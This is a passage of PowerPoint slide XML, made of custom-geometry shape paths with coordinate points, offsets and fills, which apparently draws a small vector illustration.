                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152222" y="57594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190271" y="50685"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="250228" y="40894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216789" y="31102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178155" y="35699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211607" y="48945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250228" y="40894"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="309041" y="32245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="273875" y="20154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235242" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269836" y="37426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309041" y="32245"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="367855" y="22453"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333260" y="9791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295783" y="17272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330377" y="27647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367855" y="22453"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="428383" y="10934"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="393217" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354584" y="6337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389178" y="17856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428383" y="10934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490A957C-CA95-2C53-CFD0-10E63E8DA027}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5895617" y="2727699"/>
              <a:ext cx="81915" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="43403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37976" y="20218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50601" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38521" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10664" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5022" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23339" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43163" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50584" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43403" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="72009" y="11789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="37512" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50601" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77139" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72009" y="11789"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="50584" y="2350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43163" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76489" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76563" y="10931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76802" y="10931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50584" y="2350"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="79422" y="11789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76489" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77139" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81433" y="12447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79422" y="11789"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="76802" y="10931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72009" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79422" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76802" y="10931"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="5081" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4866" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="9306" y="6388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10664" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="23339" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23339" y="4714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B1D98112-02F4-B53F-C409-CA28E1CF2AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5960238" y="2719083"/>
              <a:ext cx="71755" cy="18415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="71754" h="18414">
                  <a:moveTo>
                    <a:pt x="37476" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32287" y="17853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71493" y="12670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EB1D9801-90B1-2FBD-FCE7-8426290FA035}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5955726" y="2717909"/>
              <a:ext cx="81280" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="42127" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36646" y="20211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53668" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37238" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10341" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4888" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22639" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41846" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48446" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42127" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="71258" y="13308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36065" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53668" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76616" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71258" y="13308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="48446" y="2353"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41846" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75807" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75887" y="12664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76128" y="12664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48446" y="2353"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="77857" y="13308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75807" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75673" y="14382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76616" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80741" y="14382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77857" y="13308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="76128" y="12664"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71258" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77857" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76128" y="12664"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="4950" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4723" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="9029" y="6388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10341" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="22639" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22639" y="4714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E7709F70-78AB-B303-68F1-3DDD817BF06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6019047" y="2709293"/>
              <a:ext cx="71755" cy="16510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="71754" h="16510">
                  <a:moveTo>
                    <a:pt x="38629" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33440" y="16125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71493" y="10942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38629" y="0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ABD76A0D-8811-6688-EE76-4311249DC072}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6013881" y="2708110"/>
              <a:ext cx="81915" cy="19050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="43895" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5254" y="5766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5484" y="5766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5299" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38506" y="18483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55207" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38944" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13081" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4568" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15584" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43693" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50978" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43895" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="71595" y="11649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38114" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55207" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76286" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76676" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71595" y="11649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="50978" y="2359"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43693" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76676" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76314" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76382" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76469" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76534" y="10946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76758" y="10946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50978" y="2359"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="78869" y="11649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76469" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76382" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76314" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81725" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78869" y="11649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="76758" y="10946"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71595" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78869" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76758" y="10946"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="5254" y="5766"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5299" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5254" y="5766"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="10316" y="7335"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4568" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13081" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="15584" y="6550"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15584" y="655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0EFD5074-2F59-865F-21E0-7D1AFAD2B5BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6077852" y="2669565"/>
              <a:ext cx="250825" cy="46355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="72072" y="40881"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38633" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="35699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33439" y="46075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72072" y="40881"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="131457" y="30518"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97434" y="19570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57658" y="24180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92252" y="37426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131457" y="30518"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="189687" y="21882"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="155092" y="9791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117614" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152209" y="27063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189687" y="21882"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="250799" y="10363"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215633" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176999" y="5753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211594" y="15544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250799" y="10363"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="86969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70314ECD-E0E7-2DDF-1A01-7AF57269018E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6064596" y="2702958"/>
              <a:ext cx="248920" cy="60325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="248920" h="60325">
                  <a:moveTo>
                    <a:pt x="166049" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="28220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83024" y="59895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248497" y="29947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16604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6615719C-57F4-48C7-BEDE-6C2BCEDB95A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5786117" y="2716780"/>
              <a:ext cx="223520" cy="105410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="223520" h="105410">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="23612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223128" y="104817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223128" y="79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98264833-DA58-A9A8-1C90-043C8892BAE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5713712" y="2276952"/>
              <a:ext cx="751840" cy="551815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="65486" y="446771"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="468846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292013" y="551772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370019" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291459" y="537837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92511" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69954" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="293290" y="537518"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291459" y="537837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="459933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370019" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="471549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="743483" y="458933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="751593" y="458933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="458933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="74786" y="457528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="459189"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92511" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="446905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="457528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="457528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751839" h="551814">
                  <a:moveTo>
                    <a:pt x="65486" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69954" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68694" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
